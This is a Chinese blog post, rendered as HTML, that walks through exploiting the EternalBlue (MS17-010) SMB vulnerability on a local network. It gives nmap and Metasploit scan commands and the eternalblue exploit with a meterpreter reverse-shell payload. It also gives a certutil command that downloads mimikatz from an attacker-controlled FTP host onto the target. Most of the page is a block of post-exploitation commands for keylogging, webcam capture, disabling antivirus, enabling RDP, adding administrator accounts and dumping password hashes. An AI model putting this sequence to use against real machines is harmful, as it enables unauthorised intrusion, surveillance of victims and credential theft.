
 <!DOCTYPE HTML>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  
    <title>ms17010 | ethtool</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=3, minimum-scale=1">
    
    <meta name="author" content="香农shannon">
    
    <meta name="description" content="徐涛的随笔如果你觉得这篇对你有任何疑问，欢迎讨论交流

永恒之蓝（msf-17)内网实战利用其实这个漏洞利用的过程类似这样 扫描靶机–&amp;gt;信息收集–&amp;gt;选择exploit–&amp;gt;漏洞利用–&amp;gt;后渗透攻击
0X01 扫漏洞扫描带有该漏洞的主机的方式有多种，这里介绍两种：①通过nmap 扫">
    
    
    
    
    
    <link rel="icon" href="/img/favicon.ico">
    
    
    <link rel="apple-touch-icon" href="/img/pacman.jpg">
    <link rel="apple-touch-icon-precomposed" href="/img/pacman.jpg">
    
    <link rel="stylesheet" href="/css/style.css">
</head>
</html>
  <body>
    <header>
      <div>
		
			<div id="imglogo">
				<a href="/"><img src="/img/logo.svg" alt="ethtool" title="ethtool"/></a>
			</div>
			
			<div id="textlogo">
				<h1 class="site-name"><a href="/" title="ethtool">ethtool</a></h1>
				<h2 class="blog-motto">网络铅笔头</h2>
			</div>
			<div class="navbar"><a class="navbutton navmobile" href="#" title="Menu">
			</a></div>
			<nav class="animated">
				<ul>
					
						<li><a href="/">Home</a></li>
					
						<li><a href="/archives">Archives</a></li>
					
					<li>
					
					<form class="search" action="//google.com/search" method="get" accept-charset="utf-8">
						<label>Search</label>
						<input type="text" id="search" name="q" autocomplete="off" maxlength="20" placeholder="Search" />
						<input type="hidden" name="q" value="site:yoursite.com">
					</form>
					
					</li>
				</ul>
			</nav>			
</div>

    </header>
    <div id="container">
      <div id="main" class="post" itemscope itemprop="blogPost">
	<article itemprop="articleBody"> 
		<header class="article-info clearfix">
  <h1 itemprop="name">
    
      <a href="/2019/07/15/ms17010/" title="ms17010" itemprop="url">ms17010</a>
  </h1>
  <p class="article-author">By
    
      <a href="http://yoursite.com" title="香农shannon">香农shannon</a>
    </p>
  <p class="article-time">
    <time datetime="2019-07-15T10:53:39.000Z" itemprop="datePublished">2019-07-15</time>
    Updated:<time datetime="2019-07-16T03:43:00.548Z" itemprop="dateModified">2019-07-16</time>
    
  </p>
</header>
	<div class="article-content">
		
		
		<div id="toc" class="toc-article">
			<strong class="toc-title">Contents</strong>
		<ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#永恒之蓝（msf-17-内网实战利用"><span class="toc-number">1.</span> <span class="toc-text">永恒之蓝（msf-17)内网实战利用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0X01-扫漏洞"><span class="toc-number"></span> <span class="toc-text">0X01 扫漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-攻击"><span class="toc-number"></span> <span class="toc-text">0x02 攻击</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-后渗透攻击"><span class="toc-number"></span> <span class="toc-text">0x03 后渗透攻击</span></a>
		</div>
		
		<blockquote>
<p>徐涛的随笔<br><strong><a href="#jump_20">如果你觉得这篇对你有任何疑问，欢迎讨论交流</a></strong></p>
</blockquote>
<h3 id="永恒之蓝（msf-17-内网实战利用"><a href="#永恒之蓝（msf-17-内网实战利用" class="headerlink" title="永恒之蓝（msf-17)内网实战利用"></a>永恒之蓝（msf-17)内网实战利用</h3><p>其实这个漏洞利用的过程类似这样 扫描靶机–&gt;信息收集–&gt;选择exploit–&gt;漏洞利用–&gt;后渗透攻击</p>
<h2 id="0X01-扫漏洞"><a href="#0X01-扫漏洞" class="headerlink" title="0X01 扫漏洞"></a>0X01 扫漏洞</h2><p>扫描带有该漏洞的主机的方式有多种，这里介绍两种：<br>①通过nmap 扫描 ；<br>②通过msf 自带的辅助模块扫描</p>
<p><strong>方法1. 通过nmap 扫描</strong><br>首先确保nmap scrip包含   smb-vuln-ms17-010    这个脚本。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">一般要是明确扫哪台主机的话执行：</span><br><span class="line">nmap -p445 --script smb-vuln-ms17-010 &lt;target&gt;</span><br><span class="line"></span><br><span class="line">但大多数我们不知道，那就对整个局域网进行扫描，执行：</span><br><span class="line">nmap -p445 --script smb-vuln-ms17-010 192.168.1.0/24</span><br><span class="line"></span><br><span class="line">  实例:  </span><br><span class="line">nmap -sS -Pn -p 445 -Pn --script smb-vuln-ms17-010 10.0.47.0/24</span><br></pre></td></tr></table></figure>

<p><em>扫永恒之蓝漏洞；-sS :TCP SYN; -Pn 将所有指定主机视为已开启，跳过主机发现的过程。加上-Pn 后扫描速度会比较慢就是了</em></p>
<p><img src="http://puof7zqrg.bkt.clouddn.com/FjAq3SVnXK5HXiUmTh0yUuINO1Cp" alt><br>成功！发现两名受害者10.0.47.38/39 #Risk factor: HIGH 表示可被攻击，也就是未打补丁。</p>
<p><strong>方法2： msf 自带的辅助模块扫描</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">msfconsole </span><br><span class="line">use auxiliary/scanner/smb/smb_ms17_010</span><br><span class="line">set RHOSTS 10.0.47.38</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p>实例：<br><img src="http://puof7zqrg.bkt.clouddn.com/FspMLm6ArOhuDpaNF4sE8o5xs9li" alt></p>
<h2 id="0x02-攻击"><a href="#0x02-攻击" class="headerlink" title="0x02 攻击"></a>0x02 攻击</h2><p>在收集完带漏洞的主机信息后，尝试对主机进行EXP，使用攻击模块</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">use exploit/windows/smb/ms17_010_eternalblue</span><br><span class="line">show options</span><br><span class="line">set rhost 10.0.47.38    （待攻击目标）</span><br><span class="line">set lport 4444</span><br><span class="line">set payload windows/x64/meterpreter/reverse_tcp  #调用反弹的攻击载荷</span><br><span class="line">run/或者 exploit</span><br></pre></td></tr></table></figure>

<p><img src="http://puof7zqrg.bkt.clouddn.com/FjbIEygHjO0OG5BP3Un6AcOFwSNY" alt><br>运气好的话可顺利拿下shell后，可新建管理员用户，登录远程连接服务等操作，如</p>
<ol>
<li>查看当前用户级别（权限比较：system &gt; administartor &gt; user）<br><img src="http://puof7zqrg.bkt.clouddn.com/Fo3VvOJqjTMulzJVzC6fVRURyu_3" alt><br>set payload windows/x64/meterpreter/reverse_tcp  #调用反弹的攻击载荷<br><img src="http://puof7zqrg.bkt.clouddn.com/FhUDgOCCZdXzTEbRv6YfmhH7A8SF" alt></li>
</ol>
<p>但有时并非总是有如此好运，有时因为某种原因可能获取不到反弹shell.例如不是win7 或server2008（show target可以看到可渗透目标系统），假如系统是server2012R2。 那我们如何获取呢? 这时就用到了一个另一个辅助模块就是：<code>use auxiliary/admin/smb/ms17_010_command</code><br><img src="http://puof7zqrg.bkt.clouddn.com/Fmdv36OWFgdsok1wdqrwX15HBZt_" alt><br>这个命令可以设置一个cmd 传送到靶机执行<br><em>set command ipconfig</em><br><em>run</em><br>此时就可以利用certutil命令来将mimikatz或msf生成的木马通过搭建网站下载到靶机，实施反弹shell<br><strong>certutil -urlcache -split -f <a href="ftp://10.0.47.136/var/pub/x64/mimikatz.exe" target="_blank" rel="noopener">ftp://10.0.47.136/var/pub/x64/mimikatz.exe</a></strong></p>
<h2 id="0x03-后渗透攻击"><a href="#0x03-后渗透攻击" class="headerlink" title="0x03 后渗透攻击"></a>0x03 后渗透攻击</h2><p>基于meterpreter&gt;<br>在获取反弹shell后，提权为system .相当于获取了靶机的控制权，此时我们有甚多的命令可以操作，可以键盘记录、创建用户、抓图等部分命令如下：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">getuid #查询当前用户权限为SYSTEM</span><br><span class="line">sysinfo   # 系统信息查询，当前系统为 Windows7</span><br><span class="line">screenshot #桌面抓图</span><br><span class="line">idletime   #查看运行的时间</span><br><span class="line">webcam_list #查看是否有摄像头-----webcam_snap抓拍摄像头----webcam_stream 摄像头直播···</span><br><span class="line">webcam_scream #视频开启</span><br><span class="line">keyscan_start     keyscan_dump   #键盘记录功能</span><br><span class="line">run post/windows/manage/killav  #一键关闭杀毒软件！</span><br><span class="line">run post/windows/manage/enable_rdp #一建开启远程桌面，并帮我们关闭防火墙</span><br><span class="line">run post/windows/gather/checkvm   #查看是否为虚拟机</span><br><span class="line">run post/windows/gather/enum_logged_on_users  #列举当前登录用户</span><br><span class="line">run post/windows/gather/enum_applications    #列举该电脑上安装的应用程序</span><br><span class="line">run post/windows/gather/credentials/windows_autologin  #抓取记住自动登录密码（要是有的话）</span><br><span class="line">search -f *.txt -d c:\     #搜索C盘所有txt </span><br><span class="line">download c:\test.txt /root  #下载目标机C盘test.txt到本地root目录</span><br><span class="line">upload /root/test.txt c:\   #上传本地的test.txt到C:\</span><br><span class="line"></span><br><span class="line">shell    #直接进入系统shell，退出用exit</span><br><span class="line">&gt; net user test 123 /add  #添加账号</span><br><span class="line">&gt;net localgroup administrators admin /add  #赋予管理权限</span><br><span class="line">!获取系统管理密码 !</span><br><span class="line">load mimikatz</span><br><span class="line">hashdump  #抓取密码</span><br></pre></td></tr></table></figure>

  
	</div>
		<footer class="article-footer clearfix">

  <div class="article-tags">
  
  <span></span> <a href="/tags/永恒之蓝漏洞利用教程/">永恒之蓝漏洞利用教程</a>
  </div>




<div class="article-share" id="share">

  <div data-url="http://yoursite.com/2019/07/15/ms17010/" data-title="ms17010 | ethtool" data-tsina="" class="share clearfix">
  </div>

</div>
</footer>   	       
	</article>
	
	
</div>  
      <div class="openaside"><a class="navbutton" href="#" title="Show Sidebar"></a></div>

  <div id="toc" class="toc-aside">
  <strong class="toc-title">Contents</strong>
  <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#永恒之蓝（msf-17-内网实战利用"><span class="toc-number">1.</span> <span class="toc-text">永恒之蓝（msf-17)内网实战利用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0X01-扫漏洞"><span class="toc-number"></span> <span class="toc-text">0X01 扫漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-攻击"><span class="toc-number"></span> <span class="toc-text">0x02 攻击</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-后渗透攻击"><span class="toc-number"></span> <span class="toc-text">0x03 后渗透攻击</span></a>
  </div>

<div id="asidepart">
<div class="closeaside"><a class="closebutton" href="#" title="Hide Sidebar"></a></div>
<aside class="clearfix">

  

  
<div class="tagslist">
	<p class="asidetitle">Tags</p>
		<ul class="clearfix">
		
			<li><a href="/tags/永恒之蓝漏洞利用教程/" title="永恒之蓝漏洞利用教程">永恒之蓝漏洞利用教程<sup>1</sup></a></li>
		
		</ul>
</div>


  <div class="rsspart">
	<a href="" target="_blank" title="rss">RSS</a>
</div>

</aside>
</div>
    </div>
    <footer><div id="footer" >
	
	<div class="line">
		<span></span>
		<div class="author"></div>
	</div>
	
	
	<div class="social-font clearfix">
		
		
		
		
		
	</div>
		<p class="copyright">Powered by <a href="http://hexo.io" target="_blank" title="hexo">hexo</a> and Theme by <a href="https://github.com/A-limon/pacman" target="_blank" title="Pacman">Pacman</a> © 2019 
		
		<a href="http://yoursite.com" target="_blank" title="香农shannon">香农shannon</a>
		
		</p>
</div>
</footer>
    <script src="/js/jquery-2.1.0.min.js"></script>
<script type="text/javascript">
$(document).ready(function(){ 
  $('.navbar').click(function(){
    $('header nav').toggleClass('shownav');
  });
  var myWidth = 0;
  function getSize(){
    if( typeof( window.innerWidth ) == 'number' ) {
      myWidth = window.innerWidth;
    } else if( document.documentElement && document.documentElement.clientWidth) {
      myWidth = document.documentElement.clientWidth;
    };
  };
  var m = $('#main'),
      a = $('#asidepart'),
      c = $('.closeaside'),
      o = $('.openaside');
  $(window).resize(function(){
    getSize(); 
    if (myWidth >= 1024) {
      $('header nav').removeClass('shownav');
    }else
    {
      m.removeClass('moveMain');
      a.css('display', 'block').removeClass('fadeOut');
      o.css('display', 'none');
      
      $('#toc.toc-aside').css('display', 'none');
        
    }
  });
  c.click(function(){
    a.addClass('fadeOut').css('display', 'none');
    o.css('display', 'block').addClass('fadeIn');
    m.addClass('moveMain');
  });
  o.click(function(){
    o.css('display', 'none').removeClass('beforeFadeIn');
    a.css('display', 'block').removeClass('fadeOut').addClass('fadeIn');      
    m.removeClass('moveMain');
  });
  $(window).scroll(function(){
    o.css("top",Math.max(80,260-$(this).scrollTop()));
  });
});
</script>

<script type="text/javascript">
$(document).ready(function(){ 
  var ai = $('.article-content>iframe'),
      ae = $('.article-content>embed'),
      t  = $('#toc'),
      h  = $('article h2')
      ah = $('article h2'),
      ta = $('#toc.toc-aside'),
      o  = $('.openaside'),
      c  = $('.closeaside');
  if(ai.length>0){
    ai.wrap('<div class="video-container" />');
  };
  if(ae.length>0){
   ae.wrap('<div class="video-container" />');
  };
  if(ah.length==0){
    t.css('display','none');
  }else{
    c.click(function(){
      ta.css('display', 'block').addClass('fadeIn');
    });
    o.click(function(){
      ta.css('display', 'none');
    });
    $(window).scroll(function(){
      ta.css("top",Math.max(140,320-$(this).scrollTop()));
    });
  };
});
</script>


<script type="text/javascript">
$(document).ready(function(){ 
  var $this = $('.share'),
      url = $this.attr('data-url'),
      encodedUrl = encodeURIComponent(url),
      title = $this.attr('data-title'),
      tsina = $this.attr('data-tsina');
  var html = [
  '<a href="#" class="overlay" id="qrcode"></a>',
  '<div class="qrcode clearfix"><span>扫描二维码分享到微信朋友圈</span><a class="qrclose" href="#share"></a><strong>Loading...Please wait</strong><img id="qrcode-pic" data-src="http://s.jiathis.com/qrcode.php?url=' + encodedUrl + '"/></div>',
  '<a href="#textlogo" class="article-back-to-top" title="Top"></a>',
  '<a href="https://www.facebook.com/sharer.php?u=' + encodedUrl + '" class="article-share-facebook" target="_blank" title="Facebook"></a>',
  '<a href="#qrcode" class="article-share-qrcode" title="QRcode"></a>',
  '<a href="https://twitter.com/intent/tweet?url=' + encodedUrl + '" class="article-share-twitter" target="_blank" title="Twitter"></a>',
  '<a href="http://service.weibo.com/share/share.php?title='+title+'&url='+encodedUrl +'&ralateUid='+ tsina +'&searchPic=true&style=number' +'" class="article-share-weibo" target="_blank" title="Weibo"></a>',
  '<span title="Share to"></span>'
  ].join('');
  $this.append(html);
  $('.article-share-qrcode').click(function(){
    var imgSrc = $('#qrcode-pic').attr('data-src');
    $('#qrcode-pic').attr('src', imgSrc);
    $('#qrcode-pic').load(function(){
        $('.qrcode strong').text(' ');
    });
  });
});     
</script>






  </body>
</html>
